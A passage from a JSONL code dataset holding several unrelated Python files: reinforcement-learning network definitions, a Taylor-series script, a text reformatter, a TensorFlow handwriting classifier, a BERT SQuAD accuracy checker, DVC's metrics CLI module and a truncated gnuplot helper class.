appendix C. This is a more numerically-stable equivalent to Eq 21.\n # Try deriving it yourself as a (very difficult) exercise. :)\n logp_pi = pi_distribution.log_prob(pi_action).sum(axis=-1)\n logp_pi -= (2*(np.log(2) - pi_action - F.softplus(-2*pi_action))).sum(axis=-1)\n else:\n logp_pi = None\n\n pi_action = torch.tanh(pi_action)\n pi_action = self.act_limit * pi_action\n\n return pi_action, logp_pi\n\nclass MLPQFunction(nn.Module):\n\n def __init__(self, num_tasks, obs_dim, act_dim, hidden_sizes, activation, psp_type):\n super().__init__()\n #self.q = mlp([obs_dim + act_dim] + list(hidden_sizes) + [1], activation)\n psp_type = 'Rand' if psp_type == 'Proposed' else psp_type\n self.q = mlp_psp([obs_dim + act_dim] + list(hidden_sizes) + [1], activation, num_tasks, psp_type)\n self.num_tasks = num_tasks\n self.activation = activation\n\n def forward(self, obs, act):\n which_task = torch.argmax(obs[..., -self.num_tasks:], dim=-1).long()\n q = torch.cat([obs[..., :-self.num_tasks], act], dim=-1)\n for layer in self.q:\n if not hasattr(layer, \"o\"):\n q = layer(q)\n else:\n q = layer(q, which_task)\n #q = self.q(torch.cat([obs, act], dim=-1))\n return torch.squeeze(q, -1) # Critical to ensure q has right shape.\n\nclass ContextGenerator(nn.Module):\n\n def __init__(self, num_tasks, obs_dim, act_dim, hidden_sizes, activation):\n super().__init__()\n proposal_layers = {}\n #proposal_layers['Q1'] = [obs_dim + act_dim] + hidden_sizes + [1]\n #proposal_layers['Q2'] = proposal_layers['Q1']\n #proposal_layers['Pi'] = [obs_dim] + hidden_sizes + [hidden_sizes[-1]] * 2 #mu and log_std\n proposal_layers['Pi'] = [obs_dim] + list(hidden_sizes) + [hidden_sizes[-1]] * 2 #mu and log_std\n #proposal_layers = [obs_dim + act_dim] * 2 # Q functions\n #proposal_layers.extend([obs_dim]) # Pi Function\n #proposal_layers.extend(hidden_sizes * 3) # 3 sets of hidden layers\n #proposal_layers.extend([1] * 2) # Q function action dimensions\n #proposal_layers.extend([hidden_sizes[-1]] * 2) # Mu and Log_Std size\n self.proposal_layers = proposal_layers\n self.num_tasks = num_tasks\n all_layers = [item for item in proposal_layers.values()]\n self.proposal_network = mlp([num_tasks] + list(hidden_sizes) + [np.sum(all_layers)], activation)\n\n def forward(self, obs):\n obs = obs[..., -self.num_tasks:]\n context_layers = self.proposal_network(obs)\n context_map = {'Pi': []}\n prev_shape = 0\n for shape in self.proposal_layers['Pi']:\n context_map['Pi'].append(context_layers[..., prev_shape:prev_shape + shape])\n prev_shape += shape\n return context_map\n\n\nclass MLPActorCritic(nn.Module):\n\n def __init__(self, num_tasks, observation_space, action_space, psp_type, hidden_sizes=(256,256),\n activation=nn.ReLU):\n super().__init__()\n self.num_tasks = num_tasks\n obs_dim = observation_space.shape[0]\n act_dim = action_space.shape[0]\n act_limit = action_space.high[0]\n\n # build policy and value functions\n self.pi = SquashedGaussianMLPActor(num_tasks, obs_dim - num_tasks, act_dim, hidden_sizes, activation, act_limit, psp_type)\n self.q1 = MLPQFunction(num_tasks, obs_dim - num_tasks, act_dim, hidden_sizes, activation, psp_type)\n self.q2 = MLPQFunction(num_tasks, obs_dim - num_tasks, act_dim, hidden_sizes, activation, psp_type)\n\n self.psp_type = psp_type\n ## build context proposal function\n #if psp_type == 'Proposed':\n # self.context_gen = ContextGenerator(num_tasks, obs_dim - num_tasks, act_dim, hidden_sizes, activation)\n\n def act(self, obs, deterministic=False):\n with torch.no_grad():\n if self.psp_type == 'Proposed':\n context_list = self.context_gen(obs)\n a, _ = self.pi(obs.unsqueeze(0), deterministic, False, context=context_list['Pi'])\n else:\n a, _ = self.pi(obs.unsqueeze(0), deterministic, False)\n return a.squeeze(0).cpu().detach().numpy()\n\n def batched_act(self, obs, deterministic=False):\n with torch.no_grad():\n if self.psp_type == 'Proposed':\n context_list = self.context_gen(obs)\n a, _ = self.pi(obs, deterministic, False, context=context_list['Pi'])\n else:\n a, _ = self.pi(obs, deterministic, False)\n return a.cpu().detach().numpy()","sub_path":"spinup/algos/pytorch/superpos_sac/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":12017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"218955122","text":"import numpy as np\r\nimport sympy as sym\r\nimport math\r\nimport matplotlib.pyplot as plt\r\n\r\nx = sym.Symbol('x')\r\ne =2.7182818284590\r\n##fun = math.log(e,x+1)\r\nfx = sym.cos(x)\r\nmuestras = 51\r\nx0 = -5\r\ngrado = 2 \r\nn = grado + 1 \r\nwhile (x0 < 5):\r\n k = float(0.005)\r\n polinomio = 0\r\n while (k < n):\r\n derivada = fx.diff(x,k)\r\n derivadax0 = derivada.subs(x,x0)\r\n divisor = np.math.factorial(k)\r\n terminok = (derivadax0/divisor)*(x-x0)**k\r\n polinomio = polinomio + terminok\r\n k = k + 1\r\n plt.plot(k, x0)\r\n x0 = x0 + 1\r\nprint(polinomio)","sub_path":"Parcial 1/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"634197350","text":"from qtlayoutbuilder.lib.line_parser import LineParser\nfrom qtlayoutbuilder.lib.multiline_string_utils import MultilineString\n\n\nclass ReFormatter(object):\n \"\"\"\n This class is able to automatically re-format input text for the builder,\n such that the type-words form a neat aligned column.\n \"\"\"\n\n # Minimum width of the gutter between names and type words.\n _MIN_GUTTER = 6\n\n @classmethod\n def format(cls, one_big_string):\n lines = MultilineString.get_as_left_shifted_lines(one_big_string)\n parsed_lines = [LineParser.parse_line(line) for line in lines]\n\n # First pass is done only to measure the longest (indent + name)\n # section present.\n widest = -1\n for parsed_line in parsed_lines:\n is_a_comment, is_blank, indent, name, type_string, parenthesised = \\\n parsed_line\n if is_a_comment or is_blank:\n continue\n extent = indent + len(name)\n if extent > widest:\n widest = extent\n\n # Second pass reconstitutes the output with the padding necessary\n # to create alignment.\n formatted_lines = []\n for parsed_line, line in zip(parsed_lines, lines):\n is_a_comment, is_blank, indent, name, type_string, parenthesised = \\\n parsed_line\n if is_a_comment or is_blank:\n formatted_lines.append(line)\n continue\n padding_required = widest + cls._MIN_GUTTER - (indent + len(name))\n output_line = ''\n output_line += ' ' * indent\n output_line += name\n output_line += ' ' * padding_required\n output_line += type_string\n if parenthesised:\n output_line += '(%s)' % parenthesised\n formatted_lines.append(output_line)\n return '\\n'.join(formatted_lines)\n","sub_path":"src/qtlayoutbuilder/lib/reformatter.py","file_name":"reformatter.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"634967784","text":"#!/usr/bin/env python\n\n\"\"\"HASY with Tensorflow.\"\"\"\n\nimport input_data\nimport tensorflow as tf\nfrom tensorflow.python.framework import ops\n\nimport os\nimport numpy as np\n\nepochs = 200000\nmodel_checkpoint_path = 'checkpoints/hasy_tf_model.ckpt'\n\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n #initial = tf.constant(0.0, shape=shape)\n return tf.get_variable(initializer=initial, name='weights')\n\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.get_variable(initializer=initial, name='biases')\n\n\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\n\ndef max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1], padding='SAME')\n\n\ndef eval_network(sess, summary_writer, dataset, correct_prediction, epoch,\n mode, make_summary=False):\n correct_sum = 0\n total_test = 0\n if mode == 'test' and make_summary:\n training_summary = tf.get_default_graph().get_tensor_by_name(\"training_accuracy:0\")\n loss_summary = tf.get_default_graph().get_tensor_by_name(\"loss:0\")\n for i in range(dataset.labels.shape[0] / 1000):\n feed_dict = {x: dataset.images[i * 1000:(i + 1) * 1000],\n y_: dataset.labels[i * 1000:(i + 1) * 1000],\n keep_prob: 1.0}\n\n if mode == 'test' and make_summary:\n [test_correct, train_summ, loss_summ] = sess.run([correct_prediction,\n training_summary,\n loss_summary],\n feed_dict=feed_dict)\n summary_writer.add_summary(train_summ, epoch)\n summary_writer.add_summary(loss_summ, epoch)\n else:\n test_correct = correct_prediction.eval(feed_dict=feed_dict)\n correct_sum += sum(test_correct)\n total_test += len(test_correct)\n return float(correct_sum) / total_test\n\n\ndef log_score(sess, summary_writer, filename, data, scoring, epoch):\n with open(filename, \"a\") as myfile:\n train = eval_network(sess, summary_writer, data.train, scoring, epoch,\n \"train\")\n test = eval_network(sess, summary_writer, data.test, scoring, epoch,\n \"test\")\n myfile.write(\"%i;%0.6f;%0.6f\\n\" % (epoch, train, test))\n\n\ndef get_nonexisting_path(model_checkpoint_path):\n if not os.path.isfile(model_checkpoint_path):\n return model_checkpoint_path\n else:\n folder = os.path.dirname(model_checkpoint_path)\n filename = os.path.basename(model_checkpoint_path)\n filename, ext = os.path.splitext(filename)\n i = 1\n gen_filename = os.path.join(folder, \"%s-%i%s\" % (filename, i, ext))\n while os.path.isfile(gen_filename):\n i += 1\n gen_filename = os.path.join(folder, \"%s-%i%s\" % (filename, i, ext))\n return gen_filename\n\n\nhasy = input_data.read_data_sets('HASYv2', one_hot=True)\n\nwith tf.Session() as sess:\n x = tf.placeholder(tf.float32, shape=[None, 1024])\n y_ = tf.placeholder(tf.float32, shape=[None, 369])\n x_image = tf.reshape(x, [-1, 32, 32, 1])\n\n with tf.variable_scope('conv1') as scope:\n W_conv1 = weight_variable([5, 5, 1, 32])\n b_conv1 = bias_variable([32])\n h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1, name='ReLU1')\n h_pool1 = max_pool_2x2(h_conv1)\n\n with tf.variable_scope('conv2') as scope:\n W_conv2 = weight_variable([5, 5, 32, 32])\n b_conv2 = bias_variable([32])\n h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2, name='ReLU2')\n h_pool2 = max_pool_2x2(h_conv2)\n\n with tf.variable_scope('fc1'):\n W_fc1 = weight_variable([8 * 8 * 32, 1000])\n b_fc1 = bias_variable([1000])\n\n h_pool2_flat = tf.reshape(h_pool2, [-1, 8 * 8 * 32])\n h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\n with tf.variable_scope('dropout'):\n keep_prob = tf.placeholder(tf.float32)\n h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\n with tf.variable_scope('softmax'):\n W_fc2 = weight_variable([1000, 369])\n b_fc2 = bias_variable([369])\n\n y_conv = tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\n\n # for op in y_conv.get_operations():\n # flops = ops.get_stats_for_node_def(g, op.node_def, 'flops').value\n # print(\"FLOPS: %s\" % str(flops))\n\n total_parameters = 0\n for variable in tf.trainable_variables():\n # shape is an array of tf.Dimension\n shape = variable.get_shape()\n print(\" shape: %s\" % str(shape))\n variable_parametes = 1\n for dim in shape:\n variable_parametes *= dim.value\n print(\" variable_parametes: %i\" % variable_parametes)\n total_parameters += variable_parametes\n print(\" ---\")\n print(\"total_parameters: %i\" % total_parameters)\n\n cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y_conv + 10**(-7)),\n reduction_indices=[1]))\n train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n tf.summary.scalar(\"training_accuracy\", accuracy)\n tf.summary.scalar(\"loss\", cross_entropy)\n\n # Add ops to save and restore all the variables.\n saver = tf.train.Saver()\n summary_writer = tf.summary.FileWriter('summary_dir', sess.graph)\n\n sess.run(tf.global_variables_initializer())\n model_checkpoint_path = get_nonexisting_path(model_checkpoint_path)\n validation_curve_path = get_nonexisting_path('validation-curves/validation'\n '-curve-accuracy.csv')\n print(\"model_checkpoint_path: %s\" % model_checkpoint_path)\n print(\"validation_curve_path: %s\" % validation_curve_path)\n if not os.path.isfile(model_checkpoint_path):\n for i in range(epochs):\n batch = hasy.train.next_batch(50)\n if i % 100 == 0:\n log_score(sess, summary_writer,\n validation_curve_path,\n hasy, correct_prediction, i)\n train_step.run(feed_dict={x: batch[0],\n y_: batch[1],\n keep_prob: 0.5})\n\n log_score(sess, summary_writer, validation_curve_path,\n hasy, correct_prediction, epochs)\n\n # Save the variables to disk.\n save_path = saver.save(sess, model_checkpoint_path)\n print(\"Model saved in file: %s\" % save_path)\n else:\n saver.restore(sess, model_checkpoint_path)\n print(\"Model restored.\")\n # Export the conv1 features\n with tf.variable_scope('conv1', reuse=True) as scope_conv:\n W_conv1 = tf.get_variable('weights', shape=[5, 5, 1, 32])\n weights = W_conv1.eval()\n with open(\"conv1.weights.npz\", \"w\") as outfile:\n np.save(outfile, weights)\n\n # TODO\n for i in range(hasy.train.labels.shape[0] / 1000):\n feed_dict = {x: hasy.train.images[i * 1000:(i + 1) * 1000],\n y_: hasy.train.labels[i * 1000:(i + 1) * 1000],\n keep_prob: 1.0}\n test_correct = correct_prediction.eval(feed_dict=feed_dict)\n\n summary_writer.flush()\n summary_writer.close()\n","sub_path":"ML/hasy/tf_hasy.py","file_name":"tf_hasy.py","file_ext":"py","file_size_in_byte":7586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"85263338","text":"#! /usr/bin/env python3\n# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os, sys\nsys.path.insert(0, os.getcwd())\n\nimport argparse\nimport collections\nimport json\nimport numpy as np\n\nfrom code.bert.tensorrt.evaluate import f1_score, exact_match_score\nfrom code.bert.tensorrt.helpers.data_processing import get_predictions, read_squad_json, convert_example_to_features\nfrom code.bert.tensorrt.helpers.tokenization import BertTokenizer\nfrom code.common import logging\n\n_NetworkOutput = collections.namedtuple(\"NetworkOutput\", [\"start_logits\", \"end_logits\", \"feature_index\"])\n\ndef get_score(predictions):\n\n logging.info(\"Evaluating predictions...\")\n\n input_file = \"build/data/squad/dev-v1.1.json\"\n\n with open(input_file) as f:\n data = json.load(f)[\"data\"]\n\n f1_score_total = 0.0\n exact_score_total = 0.0\n sample_idx = 0\n for task in data:\n title = task[\"title\"]\n for paragraph_idx, paragraph in enumerate(task[\"paragraphs\"]):\n context = paragraph[\"context\"]\n for q_idx, qas in enumerate(paragraph[\"qas\"]):\n if sample_idx < len(predictions):\n answers = qas[\"answers\"]\n f1_score_this = 0.0\n exact_score_this = 0.0\n for answer in answers:\n f1_score_this = max(f1_score_this, f1_score(predictions[sample_idx], answer[\"text\"]))\n exact_score_this = max(exact_score_this, exact_match_score(predictions[sample_idx], answer[\"text\"]))\n f1_score_total += f1_score_this\n exact_score_total += exact_score_this\n sample_idx += 1\n\n f1_score_avg = f1_score_total / len(predictions) * 100\n exact_score_avg = exact_score_total / len(predictions) * 100\n\n return (exact_score_avg, f1_score_avg)\n\ndef evaluate(log_path, squad_path):\n logging.info(\"Creating tokenizer...\")\n tokenizer = BertTokenizer(\"build/models/bert/vocab.txt\")\n logging.info(\"Done creating tokenizer.\")\n\n logging.info(\"Reading SQuAD examples...\")\n eval_examples = read_squad_json(squad_path)\n logging.info(\"Done reading SQuAD examples.\")\n\n logging.info(\"Converting examples to features...\")\n max_seq_length = 384\n max_query_length = 64\n doc_stride = 128\n eval_features = []\n num_features_per_example = []\n for example_idx, example in enumerate(eval_examples):\n feature = convert_example_to_features(example.doc_tokens, example.question_text,\n tokenizer, max_seq_length, doc_stride, max_query_length)\n eval_features.extend(feature)\n num_features_per_example.append(len(feature))\n logging.info(\"Done converting examples to features.\")\n\n logging.info(\"Collecting LoadGen results...\")\n with open(log_path) as f:\n log_predictions = json.load(f)\n score_total = 0.0\n results = [None for i in range(len(eval_features))]\n\n logits_padded = np.zeros((max_seq_length, 2), dtype=np.float16)\n for prediction in log_predictions:\n qsl_idx = prediction[\"qsl_idx\"]\n assert qsl_idx < len(eval_features), \"qsl_idx exceeds total number of features\"\n\n data = np.frombuffer(bytes.fromhex(prediction[\"data\"]), np.float16)\n data = data.reshape(-1, 2)\n seq_len = data.shape[0]\n logits_padded.fill(-10000.0)\n logits_padded[:seq_len, :] = data\n start_logits = logits_padded[:,0].copy()\n end_logits = logits_padded[:,1].copy()\n results[qsl_idx] = _NetworkOutput(start_logits=start_logits, end_logits=end_logits, feature_index=qsl_idx)\n logging.info(\"Done collecting LoadGen results.\")\n\n logging.info(\"Evaluating results...\")\n predictions = []\n feature_idx = 0\n # Total number of n-best predictions to generate in the nbest_predictions.json output file\n n_best_size = 20\n # The maximum length of an answer that can be generated. This is needed\n # because the start and end predictions are not conditioned on one another\n max_answer_length = 30\n for example_idx, example in enumerate(eval_examples):\n results_per_example = []\n for i in range(num_features_per_example[example_idx]):\n results_per_example.append(results[feature_idx])\n feature_idx += 1\n\n prediction, _, _ = get_predictions(example.doc_tokens, eval_features, results_per_example, n_best_size, max_answer_length)\n predictions.append(prediction)\n\n exact_score, f1_score = get_score(predictions)\n print(\"{{\\\"exact_match\\\": {:.3f}, \\\"f1\\\": {:.3f}}}\".format(exact_score, f1_score))\n\ndef main():\n parser = argparse.ArgumentParser(\"Accuracy checker for BERT benchmark from LoadGen logs\")\n parser.add_argument(\"--mlperf-accuracy-file\", help=\"Path to LoadGen log produced in AccuracyOnly mode\")\n parser.add_argument(\"--squad-val-file\", help=\"Path to SQuAD 1.1 json file\", default=\"build/data/squad/dev-v1.1.json\")\n args = parser.parse_args()\n evaluate(args.mlperf_accuracy_file, args.squad_val_file)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"closed/Cisco/code/bert-99/tensorrt/accuracy-bert.py","file_name":"accuracy-bert.py","file_ext":"py","file_size_in_byte":5606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"87617987","text":"import argparse\nimport logging\n\nfrom dvc.command import completion\nfrom dvc.command.base import CmdBase, append_doc_link, fix_subparsers\nfrom dvc.exceptions import BadMetricError, DvcException\n\nlogger = logging.getLogger(__name__)\n\n\nDEFAULT_PRECISION = 5\n\n\ndef _show_metrics(\n metrics,\n markdown=False,\n all_branches=False,\n all_tags=False,\n all_commits=False,\n precision=None,\n):\n from dvc.utils.diff import format_dict, table\n from dvc.utils.flatten import flatten\n\n # When `metrics` contains a `None` key, it means that some files\n # specified as `targets` in `repo.metrics.show` didn't contain any metrics.\n missing = metrics.pop(None, None)\n with_rev = any([all_branches, all_tags, all_commits])\n header_set = set()\n rows = []\n\n if precision is None:\n precision = DEFAULT_PRECISION\n\n def _round(val):\n if isinstance(val, float):\n return round(val, precision)\n return val\n\n for _branch, val in metrics.items():\n for _fname, metric in val.items():\n if not isinstance(metric, dict):\n header_set.add(\"\")\n continue\n for key, _val in flatten(format_dict(metric)).items():\n header_set.add(key)\n header = sorted(header_set)\n for branch, val in metrics.items():\n for fname, metric in val.items():\n row = []\n if with_rev:\n row.append(branch)\n row.append(fname)\n if not isinstance(metric, dict):\n row.append(str(metric))\n rows.append(row)\n continue\n flattened_val = flatten(format_dict(metric))\n\n for i in header:\n row.append(_round(flattened_val.get(i)))\n rows.append(row)\n header.insert(0, \"Path\")\n if with_rev:\n header.insert(0, \"Revision\")\n\n if missing:\n raise BadMetricError(missing)\n return table(header, rows, markdown)\n\n\nclass CmdMetricsBase(CmdBase):\n UNINITIALIZED = True\n\n\nclass CmdMetricsShow(CmdMetricsBase):\n def run(self):\n try:\n metrics = self.repo.metrics.show(\n self.args.targets,\n all_branches=self.args.all_branches,\n all_tags=self.args.all_tags,\n all_commits=self.args.all_commits,\n recursive=self.args.recursive,\n )\n\n if self.args.show_json:\n import json\n\n logger.info(json.dumps(metrics))\n else:\n table = _show_metrics(\n metrics,\n self.args.show_md,\n self.args.all_branches,\n self.args.all_tags,\n self.args.all_commits,\n self.args.precision,\n )\n if table:\n logger.info(table)\n except DvcException:\n logger.exception(\"\")\n return 1\n\n return 0\n\n\ndef _show_diff(diff, markdown=False, no_path=False, precision=None):\n from collections import OrderedDict\n\n from dvc.utils.diff import table\n\n if precision is None:\n precision = DEFAULT_PRECISION\n\n def _round(val):\n if isinstance(val, float):\n return round(val, precision)\n\n return val\n\n rows = []\n for fname, mdiff in diff.items():\n sorted_mdiff = OrderedDict(sorted(mdiff.items()))\n for metric, change in sorted_mdiff.items():\n row = [] if no_path else [fname]\n row.append(metric)\n row.append(_round(change.get(\"old\")))\n row.append(_round(change[\"new\"]))\n row.append(_round(change.get(\"diff\")))\n rows.append(row)\n\n header = [] if no_path else [\"Path\"]\n header.append(\"Metric\")\n header.extend([\"Old\", \"New\"])\n header.append(\"Change\")\n\n return table(header, rows, markdown)\n\n\nclass CmdMetricsDiff(CmdMetricsBase):\n def run(self):\n try:\n diff = self.repo.metrics.diff(\n a_rev=self.args.a_rev,\n b_rev=self.args.b_rev,\n targets=self.args.targets,\n recursive=self.args.recursive,\n all=self.args.all,\n )\n\n if self.args.show_json:\n import json\n\n logger.info(json.dumps(diff))\n else:\n table = _show_diff(\n diff,\n self.args.show_md,\n self.args.no_path,\n precision=self.args.precision,\n )\n if table:\n logger.info(table)\n\n except DvcException:\n logger.exception(\"failed to show metrics diff\")\n return 1\n\n return 0\n\n\ndef add_parser(subparsers, parent_parser):\n METRICS_HELP = \"Commands to display and compare metrics.\"\n\n metrics_parser = subparsers.add_parser(\n \"metrics\",\n parents=[parent_parser],\n description=append_doc_link(METRICS_HELP, \"metrics\"),\n help=METRICS_HELP,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n )\n\n metrics_subparsers = metrics_parser.add_subparsers(\n dest=\"cmd\",\n help=\"Use `dvc metrics CMD --help` to display command-specific help.\",\n )\n\n fix_subparsers(metrics_subparsers)\n\n METRICS_SHOW_HELP = \"Print metrics, with optional formatting.\"\n metrics_show_parser = metrics_subparsers.add_parser(\n \"show\",\n parents=[parent_parser],\n description=append_doc_link(METRICS_SHOW_HELP, \"metrics/show\"),\n help=METRICS_SHOW_HELP,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n )\n metrics_show_parser.add_argument(\n \"targets\",\n nargs=\"*\",\n help=(\n \"Limit command scope to these metrics files. Using -R, \"\n \"directories to search metrics files in can also be given.\"\n ),\n ).complete = completion.FILE\n metrics_show_parser.add_argument(\n \"-a\",\n \"--all-branches\",\n action=\"store_true\",\n default=False,\n help=\"Show metrics for all branches.\",\n )\n metrics_show_parser.add_argument(\n \"-T\",\n \"--all-tags\",\n action=\"store_true\",\n default=False,\n help=\"Show metrics for all tags.\",\n )\n metrics_show_parser.add_argument(\n \"-A\",\n \"--all-commits\",\n action=\"store_true\",\n default=False,\n help=\"Show metrics for all commits.\",\n )\n metrics_show_parser.add_argument(\n \"--show-json\",\n action=\"store_true\",\n default=False,\n help=\"Show output in JSON format.\",\n )\n metrics_show_parser.add_argument(\n \"--show-md\",\n action=\"store_true\",\n default=False,\n help=\"Show tabulated output in the Markdown format (GFM).\",\n )\n metrics_show_parser.add_argument(\n \"-R\",\n \"--recursive\",\n action=\"store_true\",\n default=False,\n help=(\n \"If any target is a directory, recursively search and process \"\n \"metrics files.\"\n ),\n )\n metrics_show_parser.add_argument(\n \"--precision\",\n type=int,\n help=(\n \"Round metrics to `n` digits precision after the decimal point. \"\n f\"Rounds to {DEFAULT_PRECISION} digits by default.\"\n ),\n metavar=\"\",\n )\n metrics_show_parser.set_defaults(func=CmdMetricsShow)\n\n METRICS_DIFF_HELP = (\n \"Show changes in metrics between commits in the DVC repository, or \"\n \"between a commit and the workspace.\"\n )\n metrics_diff_parser = metrics_subparsers.add_parser(\n \"diff\",\n parents=[parent_parser],\n description=append_doc_link(METRICS_DIFF_HELP, \"metrics/diff\"),\n help=METRICS_DIFF_HELP,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n )\n metrics_diff_parser.add_argument(\n \"a_rev\", nargs=\"?\", help=\"Old Git commit to compare (defaults to HEAD)\"\n )\n metrics_diff_parser.add_argument(\n \"b_rev\",\n nargs=\"?\",\n help=\"New Git commit to compare (defaults to the current workspace)\",\n )\n metrics_diff_parser.add_argument(\n \"--targets\",\n nargs=\"*\",\n help=(\n \"Specific metrics file(s) to compare \"\n \"(even if not found as `metrics` in `dvc.yaml`). \"\n \"Using -R, directories to search metrics files in \"\n \"can also be given.\"\n \"Shows all tracked metrics by default.\"\n ),\n metavar=\"\",\n ).complete = completion.FILE\n metrics_diff_parser.add_argument(\n \"-R\",\n \"--recursive\",\n action=\"store_true\",\n default=False,\n help=(\n \"If any target is a directory, recursively search and process \"\n \"metrics files.\"\n ),\n )\n metrics_diff_parser.add_argument(\n \"--all\",\n action=\"store_true\",\n default=False,\n help=\"Show unchanged metrics as well.\",\n )\n metrics_diff_parser.add_argument(\n \"--show-json\",\n action=\"store_true\",\n default=False,\n help=\"Show output in JSON format.\",\n )\n metrics_diff_parser.add_argument(\n \"--show-md\",\n action=\"store_true\",\n default=False,\n help=\"Show tabulated output in the Markdown format (GFM).\",\n )\n metrics_diff_parser.add_argument(\n \"--no-path\",\n action=\"store_true\",\n default=False,\n help=\"Don't show metric path.\",\n )\n metrics_diff_parser.add_argument(\n \"--precision\",\n type=int,\n help=(\n \"Round metrics to `n` digits precision after the decimal point. \"\n f\"Rounds to {DEFAULT_PRECISION} digits by default.\"\n ),\n metavar=\"\",\n )\n metrics_diff_parser.set_defaults(func=CmdMetricsDiff)\n","sub_path":"dvc/command/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":9845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"38092503","text":"#!/bin/python3\n################################################################################\n# Requires:\n#\n#\n\nimport os\n\n\n###########################\n# Gnuplot\n###########################\nclass gnuplot:\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.lastPlotID = None\n self.constructed = 1\n self.plotName = \"plot\"\n self.dir = None\n self.plotTitle = \"\"\n self.x1Label = None\n self.x2Label = None\n self.y1Label = None\n self.y2Label = None\n self.plots = 1 # Number of individual plots output\n self.dataSets = 0 # Number of data sets\n self.cellParameters = [[0 for y in range(100)] for x in range(1000)]\n self.dataPointCount = [0 for y in range(100)]\n self.dataPointMultiplier = [0 for y in range(100)]\n self.dataAxes = [0 for y in range(100)]\n self.dataName = [0 for y in range(100)]\n self.dataCircles = [0 for y in range(100)]\n self.plotType = [0 for y in range(100)]\n self.maxRows = 0\n for x in range(0,1000):\n for y in range(0,100):\n self.cellParameters[x][y] = None\n for y in range(0,100):\n self.dataPointCount[y] = 0\n for y in range(0,100):\n self.dataPointMultiplier[y] = 1.0\n for y in range(0,100):\n self.dataAxes[y] = \"x1y1\"\n for y in range(0,100):\n self.dataName[y] = \" \"\n for y in range(0,100):\n self.dataCircles[y] = None\n for y in range(0,100):\n self.plotType[y] = \"linespoints\"\n # output file header\n self.plot = \"#################################################################################\\n\"\n self.plot = self.plot + \"# Gnuplot\\n\"\n self.plot = self.plot + \"#\\n\"\n self.plot = self.plot + \"#################################################################################\\n\"\n # batch list\n self.plotBatchList = \"\"\n\n def outputPlot(self, fileName):\n self.plotName = fileName\n\n def title(self, titleIn):\n self.plotTitle = titleIn\n\n def setDir(self, inDir=None):\n self.dir = inDir\n\n def axisLabel(self, axis, label):\n if(axis==\"x1\"):\n self.x1Label = label\n if(axis==\"x2\"):\n self.x2Label = label\n if(axis==\"y1\"):\n self.y1Label = label\n if(axis==\"y2\"):\n self.y2Label = label\n\n def addCircle(self, circleX, circleY, axis=1):\n if(axis==1):\n line = \"set object circle at first \"\n if(axis==2):\n line = \"set object circle at second \"\n line = line + str(circleX) + \",\" + str(circleY)\n line = line + \" radius char 0.7\"\n self.dataCircles.append(line)\n\n def addPlot(self, dataX, dataY, axis=None, dataName=\"\", xMult=1.0, yMult=1.0, plot=None):\n if(axis is None):\n axis = \"x1y1\"\n if(plot is None):\n plot = 1\n # Set x and y col\n xCol = 2 * self.dataSets\n yCol = 2 * self.dataSets + 1\n # plot multiplier\n self.dataPointMultiplier[xCol] = xMult;\n self.dataPointMultiplier[yCol] = yMult;\n self.dataName[xCol] = dataName\n # Store x data points\n row = 0\n for dataRow in dataX:\n self.cellParameters[xCol][row] = dataRow\n row = row + 1\n self.dataPointCount[xCol] = row\n self.dataAxes[xCol] = axis\n if(row>self.maxRows):\n self.maxRows = row\n row = 0\n # Store y data points\n for dataRow in dataY:\n self.cellParameters[yCol][row] = dataRow\n row = row + 1\n self.dataPointCount[yCol] = row\n # Increment data set counter\n self.dataSets = self.dataSets + 1\n # Last added\n self.lastPlotID = self.dataSets - 1\n\n def getLastPlotID(self):\n return self.lastPlotID\n\n def setPlotType(self, plotID, plotType):\n self.plotType[plotID] = plotType\n\n def makePlot(self):\n ##\n ## Set file names\n ##\n if(self.dir is not None):\n # Make dir\n cmdIn = \"mkdir -p \"+self.dir\n os.system(cmdIn)\n\n self.dataFileName = self.dir+\"/\"+self.plotName+\".csv\"\n self.gplotFileName = self.dir+\"/\"+self.plotName+\".plot\"\n self.plotFileName = self.dir+\"/\"+self.plotName+\".eps\"\n self.plotBatchName = 